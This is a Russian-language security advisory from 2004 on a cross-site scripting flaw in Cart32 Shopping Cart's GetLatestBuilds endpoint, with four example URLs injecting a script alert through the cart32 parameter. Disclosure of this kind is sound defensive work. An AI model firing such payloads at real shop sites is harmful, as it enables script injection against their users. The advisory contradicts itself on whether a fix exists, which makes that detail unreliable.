Межсайтовый скриптинг в Cart32

Дата публикации:
29.06.2004
Всего просмотров:
1242
Опасность:
Низкая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Cart32 Shopping Cart 5.x
Cart32 Shopping Cart 4.x
Уязвимые версии: Cart32

Описание: Уязвимость в Cart32 в 'GetLatestBuilds' позволяет удаленному пользователю выполнить XSS нападение.

Пример/Эксплоит:

http://vulnerable/scripts/cart32.exe/GetLatestBuilds?cart32=<script>al ert('XSS')</script>
http://vulnerable/scripts/c32web.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>
http://vulnerable/cgi-bin/cart32.exe/GetLatestBuilds?cart3 2=<script>alert('XSS')</script>
http://vulnerable/cgi-bin/c32web.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>

URL производителя: http://www.cart32.com/products.asp

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Multiple vulnerabilities PowerPortal

или введите имя

CAPTCHA